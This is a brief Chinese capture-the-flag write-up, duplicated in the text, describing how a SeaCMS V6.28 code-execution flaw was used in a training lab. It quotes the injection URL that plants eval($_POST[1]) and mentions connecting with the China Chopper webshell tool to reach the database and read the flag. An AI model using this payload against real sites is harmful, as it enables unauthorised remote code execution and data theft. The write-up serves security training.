题目在i春秋ctf训练营
又是一道cms的通用漏洞的题,直接去百度查看通用漏洞
这里我使用的是以下这个漏洞:
海洋CMS V6.28代码执行0day
按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀连接,但乍一看并没有flag.php
反手去查了一下海洋cms的数据库配置文件的存放地址:
出去用菜刀连接数据库
编辑完成后右键数据库管理,可以看到flag了
题目在i春秋ctf训练营
又是一道cms的通用漏洞的题,直接去百度查看通用漏洞
这里我使用的是以下这个漏洞:
按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀连接,但乍一看并没有flag.php
反手去查了一下海洋cms的数据库配置文件的存放地址:
出去用菜刀连接数据库
编辑完成后右键数据库管理,可以看到flag了
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。